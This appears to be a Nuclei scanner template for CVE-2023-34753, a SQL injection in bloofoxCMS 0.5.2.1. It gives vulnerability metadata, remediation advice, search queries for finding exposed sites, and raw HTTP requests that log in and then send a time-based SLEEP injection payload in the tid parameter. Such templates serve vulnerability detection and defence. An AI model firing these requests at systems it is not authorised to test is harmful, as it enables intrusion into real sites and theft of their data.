```yaml
id: CVE-2023-34753

info:
  name: bloofoxCMS v0.5.2.1 - SQL Injection
  author: theamanrawat
  severity: critical
  description: |
    bloofox v0.5.2.1 was discovered to contain a SQL injection vulnerability via the tid parameter at admin/index.php?mode=settings&page=tmpl&action=edit.
  impact: |
    Authenticated attackers can exploit SQL injection through the tid parameter in the template settings page to extract database contents, manipulate CMS data, and potentially execute commands on the underlying database server.
  remediation: |
    Update bloofoxCMS to a version newer than 0.5.2.1 that uses parameterized queries or prepared statements for the tid parameter in admin/index.php template editing functionality.
  reference:
    - https://www.bloofox.com
    - https://ndmcyb.hashnode.dev/bloofox-v0521-was-discovered-to-contain-many-sql-injection-vulnerability
    - https://nvd.nist.gov/vuln/detail/CVE-2023-34753
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2023-34753
    cwe-id: CWE-89
    epss-score: 0.04228
    epss-percentile: 0.89719
    cpe: cpe:2.3:a:bloofox:bloofoxcms:0.5.2.1:*:*:*:*:*:*:*
  metadata:
    verified: "true"
    max-request: 2
    vendor: bloofox
    product: bloofoxcms
    fofa-query:
      - "Powered by bloofoxCMS"
      - powered by bloofoxcms
  tags: time-based-sqli,cve,cve2023,sqli,bloofox,authenticated,vuln

http:
  - raw:
      - |
        POST /admin/index.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        username={{username}}&password={{password}}&action=login

      - |
        @timeout: 10s
        POST /admin/index.php?mode=settings&page=tmpl&action=edit HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        name=default&template=default.html&css=default.css&template_print=print.html&template_print_css=print.css&template_login=login.html&template_text=text.html&be=0&tid='+AND+(SELECT+7401+FROM+(SELECT(SLEEP(6)))hwrS)--+&send=Save

    matchers-condition: and
    matchers:
      - type: dsl
        dsl:
          - duration>=6
          - contains(header_2, "text/html")
          - contains(body_2, 'bloofoxCMS Admincenter')
        condition: and
# digest: 4a0a00473045022100aeb572da4e3caa2fd3d350de3ce209681c0e40f1d402cde833740ef0c409e554022014a931c973de908f69c6bb68da2c23fc427003b0a04c5ad8bf0f3c4b604e1778:922c64590222798bb761d5b6d8e72950
```